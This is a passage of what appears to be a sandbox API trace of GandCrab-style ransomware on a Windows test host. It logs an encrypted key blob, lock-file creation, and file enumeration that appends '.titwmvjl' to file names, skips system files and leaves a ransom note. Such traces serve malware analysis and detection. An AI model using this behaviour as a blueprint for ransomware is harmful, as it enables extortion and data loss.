78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0072.208] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0072.209] CloseHandle (hObject=0x2c4) returned 1 [0072.209] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.210] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.210] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x11, wMilliseconds=0x210)) [0072.210] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.210] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.210] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.211] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a09d2ca4deb61a.lock") returned 103 [0072.211] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0072.211] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.211] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.211] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned 79 [0072.211] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" [0072.211] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x5037b8 [0072.212] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.212] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.212] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.212] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.212] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.212] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.212] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.212] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a09d2ca4deb61a.lock" [0072.212] lstrlenW (lpString=".titwmvjl") returned 9 [0072.212] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a09d2ca4deb61a.lock") returned 103 [0072.212] VirtualAlloc (lpAddress=0x0, dwSize=0x10e, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.212] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 112 [0072.212] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a09d2ca4deb61a.lock") returned 103 [0072.212] lstrlenW (lpString=".lock") returned 5 [0072.212] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.213] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.213] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.213] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.213] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.213] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0072.213] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0072.213] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" [0072.213] lstrlenW (lpString=".titwmvjl") returned 9 [0072.213] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 90 [0072.213] VirtualAlloc (lpAddress=0x0, dwSize=0xf4, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.213] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.titwmvjl") returned 99 [0072.213] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 90 [0072.213] lstrlenW (lpString=".ini") returned 4 [0072.213] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.214] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".ini ") returned 5 [0072.214] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0072.214] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.214] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 90 [0072.214] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 90 [0072.214] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0072.214] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.214] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.214] lstrcmpW (lpString1="Google Chrome.lnk", lpString2=".") returned 1 [0072.214] lstrcmpW (lpString1="Google Chrome.lnk", lpString2="..") returned 1 [0072.214] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="Google Chrome.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk" [0072.214] lstrlenW (lpString=".titwmvjl") returned 9 [0072.214] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk") returned 96 [0072.214] VirtualAlloc (lpAddress=0x0, dwSize=0x100, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.214] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk.titwmvjl") returned 105 [0072.214] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk") returned 96 [0072.215] lstrlenW (lpString=".lnk") returned 4 [0072.215] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.215] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lnk ") returned 5 [0072.215] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.215] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.215] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.215] lstrcmpW (lpString1="Microsoft Outlook.lnk", lpString2=".") returned 1 [0072.215] lstrcmpW (lpString1="Microsoft Outlook.lnk", lpString2="..") returned 1 [0072.215] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="Microsoft Outlook.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk" [0072.215] lstrlenW (lpString=".titwmvjl") returned 9 [0072.215] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk") returned 100 [0072.215] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.215] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk.titwmvjl") returned 109 [0072.215] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk") returned 100 [0072.216] lstrlenW (lpString=".lnk") returned 4 [0072.216] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.216] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lnk ") returned 5 [0072.216] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.216] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.216] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.216] lstrcmpW (lpString1="Shows Desktop.lnk", lpString2=".") returned 1 [0072.216] lstrcmpW (lpString1="Shows Desktop.lnk", lpString2="..") returned 1 [0072.216] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="Shows Desktop.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" [0072.216] lstrlenW (lpString=".titwmvjl") returned 9 [0072.216] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 96 [0072.216] VirtualAlloc (lpAddress=0x0, dwSize=0x100, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.216] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.titwmvjl") returned 105 [0072.217] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 96 [0072.217] lstrlenW (lpString=".lnk") returned 4 [0072.217] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.217] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lnk ") returned 5 [0072.217] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.217] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.217] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.217] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.217] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.217] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\TITWMVJL-DECRYPT.txt" [0072.217] lstrlenW (lpString=".titwmvjl") returned 9 [0072.217] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\TITWMVJL-DECRYPT.txt") returned 99 [0072.217] VirtualAlloc (lpAddress=0x0, dwSize=0x106, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.218] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 108 [0072.218] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\TITWMVJL-DECRYPT.txt") returned 99 [0072.218] lstrlenW (lpString=".txt") returned 4 [0072.218] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.218] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.218] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.218] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.218] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\TITWMVJL-DECRYPT.txt") returned 99 [0072.218] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\TITWMVJL-DECRYPT.txt") returned 99 [0072.218] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.218] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.218] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.218] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.218] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.218] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.218] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.218] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.218] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.219] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.219] lstrcmpW (lpString1="User Pinned", lpString2=".") returned 1 [0072.219] lstrcmpW (lpString1="User Pinned", lpString2="..") returned 1 [0072.219] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="User Pinned" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") 